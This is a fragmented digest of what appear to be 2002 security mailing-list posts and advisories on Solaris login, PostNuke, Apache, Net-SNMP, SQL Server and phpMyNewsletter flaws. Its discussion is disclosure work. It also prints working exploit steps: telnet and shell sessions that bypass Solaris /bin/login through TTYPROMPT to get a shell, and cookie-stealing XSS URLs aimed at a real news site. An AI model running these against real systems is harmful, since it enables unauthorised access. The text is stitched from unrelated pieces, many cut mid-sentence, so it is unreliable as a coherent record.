On Wed, 02 Oct 2002, you wrote:
But, the remote setting of TTYPROMPT does matter. You cannot succeed in
logging in without remotely changing the TTYPROMPT. This is also the bug
mentioned in Jonathan's original letter (bid:5531).
I have heard several conflicting reports on this matter and there
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
+------------------------------------------------------------------------+
| EnGarde Secure Linux Security Advisory                October 03, 2002 |
| http://www.engardelinux.org/                          ESA-20021003-021 |
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
+------------------------------------------------------------------------+
| EnGarde Secure Linux Security Advisory                October 03, 2002 |
| http://www.engardelinux.org/                          ESA-20021003-022 |
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
- -
GENTOO LINUX SECURITY ANNOUNCEMENT
- -
PACKAGE :gv
SUMMARY :Execution of Arbitrary Shell
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
- --
CONECTIVA LINUX SECURITY ANNOUNCEMENT
- --
PACKAGE : XFree86
SUMMARY : Local vulnerabilities
I saw the problem has been solved, and the GETs you proposed below no
longer work. But if you use the following GET, the popup appears again:
on the url http://news.postnuke.com/modules.php
the get
?op=modloadname=Newsfile=articlesid=scriptalert(document.cookie);/script+
Best Regards,
Works like a champ on Solaris 2.6/Sparc:
-- begin --
~ $ telnet
telnet> environ define TTYPROMPT abcdef
telnet> o localhost
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
SunOS 5.6
bin c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c
c
In-Reply-To: [EMAIL PROTECTED]
This exploit can also be done locally to gain higher privileges.
tester#TTYPROMPT=aa;export TTYPROMPT
tester#exec login
bin c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c
c c c c c c c c c c c c c c c/n
tester:bin#
Patches to resolve
On Wed, Oct 02, 2002 at 12:13:09PM -0400, Jonathan S wrote:
Hello,
Solaris 2.6, 7, and 8 /bin/login has a vulnerability involving the
environment variable TTYPROMPT. This vulnerability has already been
reported to BugTraq and a patch has been released by Sun.
However, a very simple
how can you get rid of Commonname?
Cheers
-Original Message-
From: Eric Stevens [mailto:[EMAIL PROTECTED]]
Sent: Thu, October 03, 2002 3:10 PM
To: Bugtraq; [EMAIL PROTECTED]
Subject: CommonName Toolbar potentially exposes LAN web addresses
Due to a bug in the URL validation done in
Sorry but I can't reproduce this on a Solaris 7 machine.
sunlight.ccs% telnet
telnet> environ define TTYPROMPT abcdef
telnet> o localhost
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
SunOS 5.7
login: bin c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c
c
In fact, I noticed the Resolve Local Intranet Names option; altering its
setting had no noticeable effect on behavior.
Further, I ran the uninstaller with all other applications closed, and
although the options for CommonName were removed from within Internet
Explorer, local addresses were still
NGSSoftware Insight Security Research Advisory
Name: Windows Help System Buffer Overflow
Systems: Windows XP,2000,NT,ME and 98
Severity: High Risk
Category: Buffer Overflow Vulnerability
Vendor URL: http://www.microsoft.com/
Author: David Litchfield ([EMAIL PROTECTED])
Advisory URL:
Discovered:
2002-09-08, Ximian has been informed on 2002-09-09.
Impact:
medium, if SSL (IMAPS, SMTPS, POP3S) used
none, if not
Affected:
Ximian Evolution 1.0.x and earlier
Description:
Due to missing SSL validation code, Evolution's camel component is
vulnerable to common SSL man-in-the-middle
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
- -
GENTOO LINUX SECURITY ANNOUNCEMENT
- -
PACKAGE :python
SUMMARY :os.execvpe() vulnerability
The cumulative patch at
http://www.microsoft.com/technet/treeview/?url=/technet/security/bulletin/MS02-056.asp
addresses 4 vulnerabilities in SQL Server 7 and 2000. Dave
Aitel's (www.immunitysec.com) hello bug (unauthenticated buffer overflow
during authentication) is patched here.
Also
On Wed, 2 Oct 2002, buzheng wrote:
I do not think this is a new bug.
I completely agree.
But, the remote setting of TTYPROMPT does matter. You cannot succeed in
logging in without remotely changing the TTYPROMPT. This is also the bug
mentioned in Jonathan's original letter (bid:5531).
That's
People in Immunity's Vulnerability Disclosure Club or people who have
purchased CORE Impact or people who have written their own SQL Server
Hello exploit can verify that this statement from the Microsoft Advisory
is, in fact, completely untrue.
The default install, in fact, every install I've
Another thing, if you tcpwrap your telnet sessions, you can prevent
localhost telnets.
Ramon Kagan
York University, Computing and Network Services
Unix Team - Intermediate System Administrator
(416)736-2100 #20263
[EMAIL PROTECTED]
-
I have not failed. I
Hi.
On June 28th, DigitalFactory alienated part of its Linux
business. And now, SP, Inc. is selling Kondara MNU/Linux.
Press release from DigitalFactory (Japanese Language Only):
http://www.digitalfactory.co.jp/news/press/020628.html
After that, the Kondara Project, which is the development project of
It may be worth noting that the 2.0 and 2.1 releases are also
vulnerable, however 1.0 does not seem to be (getting worse, as 4.x
introduces a drop-down list of user names to choose from as well).
Also, it runs on some systems on port 49400 and https on 2381 (as well
as the 2301 mentioned below).
Apparently, Dave Ahmad wrote:
%
% These may be fixes for this vulnerability, however they apply to telnetd
% and this vulnerability has to be in login.
So it makes more sense to apply the right patches to login, and not
patches to telnetd. If you only want to install the necessary patches
to
In-Reply-To: [EMAIL PROTECTED]
As it turns out the Postnuke issue in particular is a red herring.
As the lead developer describes it -- the cookie generated is a local
site cookie that is sandboxed within the confines of the
browser/session.
It is not the remote user's cookie.
The
On Wed, 2 Oct 2002 16:14:45 -0400, David Endler [EMAIL PROTECTED] said:
David> This issue potentially affects any Net-SNMP installation in
David> which the public read-only community string has not been
David> changed.
net-snmp does not release packages with a pre-configured public
community
I just checked it again :
http://news.postnuke.com/modules.php?op=modloadname=Newsfile=articlesid=script+alert(document.cookie);/script
where + denotes a blank space or similarly this one:
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
iDEFENSE Security Advisory 10.03.2002
Apache 1.3.x shared memory scoreboard vulnerabilities
16:00 GMT, October 3, 2002
I. BACKGROUND
The Apache Software Foundation's HTTP Server is an effort to develop
and maintain an open-source HTTP server for
-
Class : Input Validation Error
Risk : Due to the simplicity of the attack and the number of sites
that run module books, the risk is classified as Medium to
High.
URL :
Information :
°°
Product : phpMyNewsletter
Tested version : 0.6.10
Website : http://gregory.kokanosky.free.fr/phpmynewsletter/
Problem : include file
PHP code :
°°
/include/customize.php
<?
$langfile = $l;
include $l;
?>
/include/customize.php
Exploit :